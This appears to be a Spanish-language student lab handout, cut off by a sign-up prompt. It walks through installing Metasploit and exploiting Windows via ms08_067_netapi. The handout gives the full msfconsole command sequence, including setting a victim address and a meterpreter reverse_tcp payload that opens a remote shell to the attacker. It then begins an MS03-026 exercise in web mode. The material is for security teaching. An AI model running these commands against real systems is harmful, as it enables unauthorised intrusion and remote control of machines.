Estudiante
http://www.metasploit.com/redmine/projects/framework/wiki/Install_Ubuntu
Descargar y Desempaquetar
Verifique que el paquete “ruby” se encuentreinstalado en la máquina. Descargar el paquete de MestaSploit desde la dirección siguiente:
http://www.metasploit.com/framework/download
Para este ejercicio, descargar la versión 3.3.3(framework-3.3.3.tar.bz2)
Una vez descargada, se deberá desempaquetar e intresar al directorio msf3
Actualizar el framework digitando : svn update
MODO CONSOLA
Deberá deejecutarla en modo consola : ./msfconsole
Utilizar los comandos siguientes para conocer el paquete:
msf > show exploits
Objetivo: MS Windows
La actividad a realizar es con elexploit: windows/smb/ms08_067_netapi. Para ello debe ejecutar los comandos siguientes:
./msfconsole
msf > show exploits
msf > use windows/smb/ms08_067_netapi
msfexploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set rhost direccion_IP_victima
msf exploit(ms08_067_netapi) > show payloads
Una vez que se muestren losPAYLOAD´s, seleccionar el payload meterpreter
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Luego seleccionar al atacante:
msfexploit(ms08_067_netapi) > set lhost direccion_IP_atacante
Para ver que todos los valores fueron puestos correctamente:
msf exploit(ms08_067_netapi) > set
Por último, ejecutar el exploit:msf exploit(ms08_067_netapi) > exploit
MODO WEB
Objetivo: MS Windows
Terminar el proceso actual y ejecutarlo en modo Web : ./msfweb
En el browser : http://127.0.0.1:55555La actividad a realizar es con el exploit: msrpc_dcom_ms03_026 (Microsoft RPC DCOM MS03-026).
Seleccionar Exploits y en el campo Search colocar ANI icon
Seleccionar Windows...
Regístrate para leer el documento completo.